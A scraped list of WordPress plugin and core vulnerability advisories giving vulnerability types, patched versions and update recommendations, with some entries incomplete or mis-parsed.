Plugin: Libsyn Publisher Hub

Vulnerability: Sensitive Information Exposure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Responsive Menu – Create Mobile-Friendly Menu

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: WPS Cleaner

Vulnerability: Arbitrary Media File Disclosure
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: InfiniteWP Client

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 1.6.1.1
Recommended Action: Update to version 1.6.1.1, or a newer patched version

Plugin: PPOM – Product Addons & Custom Fields for WooCommerce

Vulnerability: Missing Authorization to Stored Cross-Site Scripting
Patched Version: 24.0
Recommended Action: Update to version 24.0, or a newer patched version

Plugin: Video Slider – Slider Carousel

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Core: WordPress

Vulnerability: Directory Traversal during unzip
Patched Version: 3.7.22
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.22, 3.8.22, 3.9.20, 4.0.19, 4.1.19, 4.2.16, 4.3.12, 4.4.11, 4.5.10, 4.6.7, 4.7.6, 4.8.2

Core: WordPress

Vulnerability: Path Disclosure
Patched Version: 3.7.18
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.18, 3.8.18, 3.9.16, 4.0.15, 4.1.15, 4.2.12, 4.3.8, 4.4.7, 4.5.6, 4.6.3, 4.7.2

Plugin: BMI Calculator Plugin

Plugin: Job Manager

Vulnerability: < 0.7.23
Patched Version: 0.7.23
Recommended Action: Update to version 0.7.23, or a newer patched version

Plugin: Essential Addons for Elementor – Popular Elementor Addon With Ready Templates, Advanced Widgets, Kits & WooCommerce Builders

Vulnerability: Authenticated (Contributor+) Privilege Escalation
Patched Version: 5.8.9
Recommended Action: Update to version 5.8.9, or a newer patched version

Plugin: My Link Order

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Nested Pages

Vulnerability: Missing Authorization to Authenticated (Editor+) Plugin Settings Reset
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: Newsletters

Vulnerability: Object Injection
Patched Version: 4.6.8.6
Recommended Action: Update to version 4.6.8.6, or a newer patched version

Core: WordPress

Plugin: Ninja Forms – File Uploads

Vulnerability: File Uploads Extension <= 3.3.12
Patched Version: 3.3.13
Recommended Action: Update to version 3.3.13, or a newer patched version

Plugin: Controlled Admin Access

Vulnerability: Privilege Escalation
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: Booking Package

Vulnerability: Unauthenticated Sensitive Data Disclosure
Patched Version: 1.5.29
Recommended Action: Update to version 1.5.29, or a newer patched version

Plugin: wordTube

Vulnerability: Directory Traversal and File Inclusion
Patched Version: 1.44
Recommended Action: Update to version 1.44, or a newer patched version

Plugin: Popup Box – Create Countdown, Coupon, Video, Contact Form Popups

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: Migration, Backup, Staging – WPvivid Backup & Migration

Vulnerability: Authenticated (Administrator+) Path Traversal
Patched Version: 0.9.76
Recommended Action: Update to version 0.9.76, or a newer patched version

Plugin: WP Time Slots Booking Form

Vulnerability: Missing Authorization to Feedback Submission
Patched Version: 1.1.77
Recommended Action: Update to version 1.1.77, or a newer patched version

Plugin: Garden Gnome Package

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.2.9
Recommended Action: Update to version 2.2.9, or a newer patched version

Plugin: Gmedia Photo Gallery

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.20.0
Recommended Action: Update to version 1.20.0, or a newer patched version

Plugin: WP Admin Style

Plugin: SQL Shortcode

Vulnerability: SQL Execution
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Code Snippets Extended

Vulnerability: Cross-Site Request Forgery to Remote Code Execution
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Authenticated (Contributor+) Directory Traversal via Shortcodes
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Auto Affiliate Links

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 6.4.2.5
Recommended Action: Update to version 6.4.2.5, or a newer patched version

Plugin: Bold Page Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 4.7.0
Recommended Action: Update to version 4.7.0, or a newer patched version

Plugin: WebLibrarian

Vulnerability: SQL Injection
Patched Version: 3.5.5
Recommended Action: Update to version 3.5.5, or a newer patched version

Plugin: Restaurant Menu and Food Ordering

Vulnerability: Admin+ Stored Cross Site Scripting
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Backup Migration

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Store Locator WordPress

Vulnerability: Authenticated(Administrator+) Directory Traversal to Arbitrary File Deletion
Patched Version: 1.4.15
Recommended Action: Update to version 1.4.15, or a newer patched version

Plugin: Booking Ultra Pro Appointments Booking Calendar Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: WP Job Board

Plugin: Private Messages For WordPress

Plugin: LinkedIn Company Updates

Plugin: Squirrly SEO – Advanced Pack

Vulnerability: Advanced Pack <= 2.3.8
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: 5.0.7
Patched Version: 5.0.8
Recommended Action: Update to version 5.0.8, or a newer patched version

Plugin: MDC Private Message

Plugin: Peter’s Custom Anti-Spam

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: LiteSpeed Cache

Vulnerability: Authenticated Stored Cross-Site Scripting via IP setting
Patched Version: 3.6.1
Recommended Action: Update to version 3.6.1, or a newer patched version

Core: WordPress

Vulnerability: Stored Cross-Site Scripting via post slugs
Patched Version: 3.7.35
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.35, 3.8.35, 3.9.33, 4.0.32, 4.1.32, 4.2.29, 4.3.25, 4.4.24, 4.5.23, 4.6.20, 4.7.19, 4.8.15, 4.9.16, 5.0.11, 5.1.7, 5.2.8, 5.3.5, 5.4.3, 5.5.2

Plugin: Video Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.11
Recommended Action: Update to version 1.0.11, or a newer patched version

Plugin: Post SMTP – WordPress SMTP Plugin with Email Logs and Mobile App for Failure Notifications – Gmail SMTP, Office 365, Brevo, Mailgun, Amazon SES and more

Vulnerability: Authenticated (Administrator+) Blind Server-Side Request Forgery
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: GoToWP

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Breadcrumbs by menu

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: YourChannel: Everything you want in a YouTube plugin.

Vulnerability: No subtitle
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: Remote Code Execution
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Icegram Engage – Ultimate WP Popup Builder, Lead Generation, Optins, and CTA

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.12
Recommended Action: Update to version 3.1.12, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Missing Authorization on ajax_save_folder_order
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: Simple Org Chart

Plugin: Dynamic Widgets

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.11
Recommended Action: Update to version 1.5.11, or a newer patched version

Plugin: WP Inimat

Plugin: Logo Slider – Logo Showcase, Logo Carousel, Logo Gallery and Client Logo Presentation

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.3.8
Recommended Action: Update to version 3.3.8, or a newer patched version

Plugin: Get Custom Field Values

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 4.0.1
Recommended Action: Update to version 4.0.1, or a newer patched version

Plugin: Chained Quiz

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.8.2
Recommended Action: Update to version 1.1.8.2, or a newer patched version

Plugin: WP Editor

Vulnerability: Authenticated (Admin+) SQL injection
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: Simple Podcasting

Vulnerability: Prototype Pollution
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Tablesome Table – Contact Form DB – WPForms, CF7, Gravity, Forminator, Fluent

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Wbcom Designs – BuddyPress Group Reviews

Vulnerability: Cross-Site Scripting
Patched Version: 2.8.2
Recommended Action: Update to version 2.8.2, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: Members Import

Vulnerability: Cross-Site Request Forgery to User Import and Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Order Your Posts Manually

Vulnerability: Reflected Cross-Site Scripting via ‘_user_request’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: FoxyPress

Vulnerability: Cross-Site Scripting
Patched Version: 0.4.2.7
Recommended Action: Update to version 0.4.2.7, or a newer patched version

Plugin: Template Debugger

Plugin: Plugin LBstopattack

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: LeadSquared Suite

Plugin: Easy Testimonials

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 3.7
Recommended Action: Update to version 3.7, or a newer patched version

Plugin: Kento Post View Counter

Plugin: WP Report Post

Plugin: Post Affiliate Pro

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.25.0
Recommended Action: Update to version 1.25.0, or a newer patched version

Plugin: Rock Convert

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.11.0
Recommended Action: Update to version 2.11.0, or a newer patched version

Plugin: WR ContactForm

Vulnerability: SQL Injection
Patched Version: 1.1.10
Recommended Action: Update to version 1.1.10, or a newer patched version

Plugin: Exports and Reports

Vulnerability: CSV Injection
Patched Version: 0.9.2
Recommended Action: Update to version 0.9.2, or a newer patched version

Plugin: Responsive Slider – Image Slider – Slideshow for WordPress

Vulnerability: Authenticated SQL Injection
Patched Version: 2.8.7
Recommended Action: Update to version 2.8.7, or a newer patched version

Plugin: affiliate-toolkit – WP Affiliate Plugin with Amazon

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 3.3.4
Recommended Action: Update to version 3.3.4, or a newer patched version

Plugin: WPS Bidouille

Vulnerability: Multiple Cross-Site Request Forgery
Patched Version: 1.12.4
Recommended Action: Update to version 1.12.4, or a newer patched version

Core: WordPress

Vulnerability: Authenticated SQL Injection
Patched Version: 3.7.18
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.18, 3.8.18, 3.9.16, 4.0.15, 4.1.15, 4.2.12, 4.3.8, 4.4.7, 4.5.6, 4.6.3, 4.7.2

Plugin: Blaze Slideshow

Vulnerability: Arbitrary File Upload
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: JetWidgets For Elementor

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 1.0.13
Recommended Action: Update to version 1.0.13, or a newer patched version

Plugin: My Calendar – Accessible Event Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.30
Recommended Action: Update to version 2.3.30, or a newer patched version

Plugin: Hero Banner Ultimate

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcodes
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: AddToAny Share Buttons

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.7.48
Recommended Action: Update to version 1.7.48, or a newer patched version

Plugin: Sideblog WordPress Plugin

Plugin: Outbound Link Manager

Plugin: Pre-Publish Checklist

Vulnerability: Insecure Direct Object Reference to Arbitrary Post ‘_ppc_meta_key’ Update
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.6.67
Recommended Action: Update to version 3.6.67, or a newer patched version

Plugin: Newsletters

Vulnerability: Directory Traversal
Patched Version: 4.6.4.3
Recommended Action: Update to version 4.6.4.3, or a newer patched version

Plugin: Very Simple Google Maps

Vulnerability: Authenticated (Contributor+) Stored Cross Site Scripting
Patched Version: 2.9
Recommended Action: Update to version 2.9, or a newer patched version

Plugin: WP Users Media

Vulnerability: Missing Authorization via wpusme_save_settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Relevanssi – A Better Search (Pro)

Vulnerability: A Better Search Free & Premium <= 2.16.3 & 4.14.3
Patched Version: 2.16.4
Recommended Action: Update to version 2.16.4, or a newer patched version

Plugin: White Label Branding for Elementor Page Builder

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Event Tickets and Registration

Vulnerability: CSV Injection
Patched Version: 4.10.7.2
Recommended Action: Update to version 4.10.7.2, or a newer patched version

Plugin: Curtain

Plugin: Kaswara Modern VC Addons

Plugin: Extensions for Leaflet Map

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: IgniteUp – Coming Soon and Maintenance Mode

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Modern Events Calendar Lite

Vulnerability: Unauthenticated Events Export
Patched Version: 5.16.5
Recommended Action: Update to version 5.16.5, or a newer patched version

Plugin: Security Optimizer – The All-In-One Protection Plugin

Vulnerability: Authorization Weakness to Authentication Bypass
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: 3.1.1.4.1
Patched Version: 3.1.1.4.2
Recommended Action: Update to version 3.1.1.4.2, or a newer patched version

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: Unauthenticated Plugin Settings Reset
Patched Version: 4.3.6
Recommended Action: Update to version 4.3.6, or a newer patched version

Plugin: wpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross Site Scripting
Patched Version: 2.1.50
Recommended Action: Update to version 2.1.50, or a newer patched version

Plugin: WooCommerce Stripe Payment Gateway

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.6.1
Recommended Action: Update to version 7.6.1, or a newer patched version

Plugin: WP Construction Mode

Vulnerability: Cross-Site Scripting
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: Pondol Carousel

Plugin: All in One Time Clock Lite – Tracking Employee Time Has Never Been Easier

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.3.321
Recommended Action: Update to version 1.3.321, or a newer patched version

Plugin: Bamboo Columns

Plugin: Easy Digital Downloads – Invoices

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Registration, User Profile, Membership, Content Restriction, User Directory, and Frontend Post Submission – WP User Frontend

Vulnerability: Missing Authorization via AJAX actions
Patched Version: 3.6.9
Recommended Action: Update to version 3.6.9, or a newer patched version

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.1.9
Recommended Action: Update to version 2.5.1.9, or a newer patched version

Plugin: Hide Admin Bar Based on User Roles

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: Easy Banners

Plugin: Quill Forms | The Best Typeform Alternative | Create Conversational Multi Step Form, Survey, Quiz, Cost Estimation or Donation Form on WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.4.0
Recommended Action: Update to version 3.4.0, or a newer patched version

Plugin: HTTP Headers

Vulnerability: Authenticated(Administrator+) SQL Injection
Patched Version: 1.18.9
Recommended Action: Update to version 1.18.9, or a newer patched version

Plugin: WordPress Button Plugin MaxButtons

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 9.3
Recommended Action: Update to version 9.3, or a newer patched version

Plugin: Salon Booking System

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.9.4
Recommended Action: Update to version 7.9.4, or a newer patched version

Plugin: Shortcodes Finder

Vulnerability: Reflected Cross-Site Scripting via nonce
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: WP Map Block – Gutenberg Map Block for Google Map and OpenStreet Map by aBlocks

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Booking calendar, Appointment Booking System

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: Help Desk WP

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Pretty Google Calendar

Vulnerability: Authenticated(Contributor+) Stored Cross-Site Scripting via pretty_google_calendar shortcode
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Duplicate Page

Vulnerability: SQL Injection
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: Car Rental by BestWebSoft

Plugin: Complianz – GDPR/CCPA Cookie Consent

Vulnerability: GDPR/CCPA Cookie Consent <= 6.4.4
Patched Version: 6.4.5
Recommended Action: Update to version 6.4.5, or a newer patched version

Plugin: WP User – Custom Registration Forms, Login and User Profile

Plugin: EWWW Image Optimizer

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 5.9
Recommended Action: Update to version 5.9, or a newer patched version

Plugin: Easy Social Icons

Vulnerability: No subtitle
Patched Version: 3.0.9
Recommended Action: Update to version 3.0.9, or a newer patched version

Plugin: YourMembership Single Sign On – YM SSO Login

Vulnerability: Missing Authorization
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Manager for Icomoon

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Easy Captcha

Vulnerability: Missing Authorization via easy_captcha_update_settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Email Marketing Plugin – WP Email Capture

Vulnerability: Cross Site Request Forgery
Patched Version: 3.10
Recommended Action: Update to version 3.10, or a newer patched version

Plugin: PPOM – Product Addons & Custom Fields for WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 32.0.6
Recommended Action: Update to version 32.0.6, or a newer patched version

Plugin: MiniMax – Page Layout Builder

Plugin: Simple History – Track, Log, and Audit WordPress Changes

Vulnerability: Authenticated (Subscriber+) CSV Injection
Patched Version: 3.4.0
Recommended Action: Update to version 3.4.0, or a newer patched version

Plugin: AJAX Multi Upload

Vulnerability: Arbitrary File Upload
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Multiple Post Passwords

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: WP Post to PDF

Plugin: PhonePe Payment Solutions

Vulnerability: Authenticated (Subscriber+) Server-Side Request Forgery
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: WP Clean Up

Vulnerability: Cross-Site Request Forgery via wp_clean_up_optimize
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LDD Directory Lite

Vulnerability: <= 3.5
Patched Version: 3.6
Recommended Action: Update to version 3.6, or a newer patched version

Plugin: SlideDeck 2 Lite Responsive Content Slider

Vulnerability: Local/Remote File Inclusion
Patched Version: 2.3.5
Recommended Action: Update to version 2.3.5, or a newer patched version

Plugin: GigPress

Vulnerability: SQL Injection
Patched Version: 2.3.9
Recommended Action: Update to version 2.3.9, or a newer patched version

Plugin: HC Custom WP-Admin URL

Plugin: Custom Banners

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 3.3
Recommended Action: Update to version 3.3, or a newer patched version

Plugin: Nexter Extension

Vulnerability: Reflected Cross-Site Scripting via post and post_id
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Tracking Code Manager

Vulnerability: Cross-Site Scripting
Patched Version: 1.11.5
Recommended Action: Update to version 1.11.5, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Information Disclosure via Debug Log
Patched Version: 4.13.3
Recommended Action: Update to version 4.13.3, or a newer patched version

Plugin: WP Data Access – App, Table, Form and Chart Builder plugin

Vulnerability: Authenticated (Subscriber+) Privilege Escalation
Patched Version: 5.3.8
Recommended Action: Update to version 5.3.8, or a newer patched version

Plugin: Futurio Extra

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: Social Sharing Plugin – Social Warfare

Vulnerability: Social Warfare <= 4.4.3
Patched Version: 4.4.4
Recommended Action: Update to version 4.4.4, or a newer patched version

Plugin: Accordion

Plugin: YITH Maintenance Mode

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: WooCommerce Product Categories Selection Widget

Plugin: Amazon JS

Plugin: Easy PayPal & Stripe Buy Now Button

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: BBS e-Popup

Plugin: Make Connector

Vulnerability: Authenticated (Subscriber+) Information Disclosure
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: All-in-One Video Gallery

Vulnerability: Admin+ Local File Inclusion
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: GDPR Cookie Compliance – Cookie Banner, Cookie Consent, Cookie Notice – CCPA, DSGVO, RGPD

Vulnerability: Cross-Site Request Forgery to License Modification
Patched Version: 4.12.5
Recommended Action: Update to version 4.12.5, or a newer patched version

Plugin: LadiApp: Landing Page, PopupX, Marketing Automation, Affiliate Marketing…

Core: WordPress

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: LetsRecover – WooCommerce Abandoned Cart Notifications

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Currency Switcher for WooCommerce

Vulnerability: Authorization Bypass
Patched Version: 2.11.2
Recommended Action: Update to version 2.11.2, or a newer patched version

Plugin: TinyMCE Color Picker

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: WordPress Ping Optimizer

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.35.1.3.0
Recommended Action: Update to version 2.35.1.3.0, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: CF7 Invisible reCAPTCHA

Vulnerability: Cross-Site Request Forgery via vsz_cf7_invisible_recaptcha_page
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: Buddyboss Platform

Vulnerability: SQL Injection
Patched Version: 1.7.9
Recommended Action: Update to version 1.7.9, or a newer patched version

Plugin: wp-restful

Plugin: Awesome Support – WordPress HelpDesk & Support Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.7
Recommended Action: Update to version 3.1.7, or a newer patched version

Plugin: FoxyPress

Vulnerability: Arbitrary File Upload
Patched Version: 0.4.2.2
Recommended Action: Update to version 0.4.2.2, or a newer patched version

Plugin: Albo Pretorio On line

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.6.2
Recommended Action: Update to version 4.6.2, or a newer patched version

Plugin: SCORM Cloud For WordPress

Vulnerability: SQL Injection
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Authenticated (Subscriber+) Information Disclosure via mf_last_name shortcode
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: Contact Form to Any API

Vulnerability: Authenticated (Administrator+) SQL Injection via ‘form_id’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: WP Shamsi – افزونه تاریخ شمسی و فارسی ساز وردپرس

Vulnerability: Missing Authorization leading to Authenticated (Subscriber+) Attachment Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Redirection

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.12
Recommended Action: Update to version 2.2.12, or a newer patched version

Plugin: qTranslate

Plugin: WP Rss Poster

Plugin: 1-flash-gallery

Plugin: SMS OVH

Plugin: Custom Post Type Page Template

Plugin: Get Custom Field Values

Vulnerability: Arbitrary Post Metadata Access
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: WP-Invoice – Web Invoice and Billing

Vulnerability: Missing Authorization
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: Vertical scroll recent post

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 14.0
Recommended Action: Update to version 14.0, or a newer patched version

Plugin: Team Showcase

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.22.16
Recommended Action: Update to version 1.22.16, or a newer patched version

Plugin: Redirects

Plugin: Visitors Online by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.0
Recommended Action: Update to version 1.0.0, or a newer patched version

Plugin: Archivist – Custom Archive Templates

Vulnerability: Authenticated(Admin+) Stored Cross-Site Scripting
Patched Version: 1.7.5
Recommended Action: Update to version 1.7.5, or a newer patched version

Plugin: Amazon Affiliate

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.17.1
Recommended Action: Update to version 3.17.1, or a newer patched version

Plugin: All-in-One WP Migration and Backup

Vulnerability: Unauthenticated Reflected Cross-Site Scripting
Patched Version: 7.63
Recommended Action: Update to version 7.63, or a newer patched version

Plugin: Delhivery Logistics Courier

Plugin: Canto

Vulnerability: Blind Server-Side Request Forgery via download.php
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: Contact Form by ContactMe.com

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.4.6
Recommended Action: Update to version 6.4.6, or a newer patched version

Plugin: CMS Press

Plugin: Simple URLs – Link Cloaking, Product Displays, and Affiliate Link Management

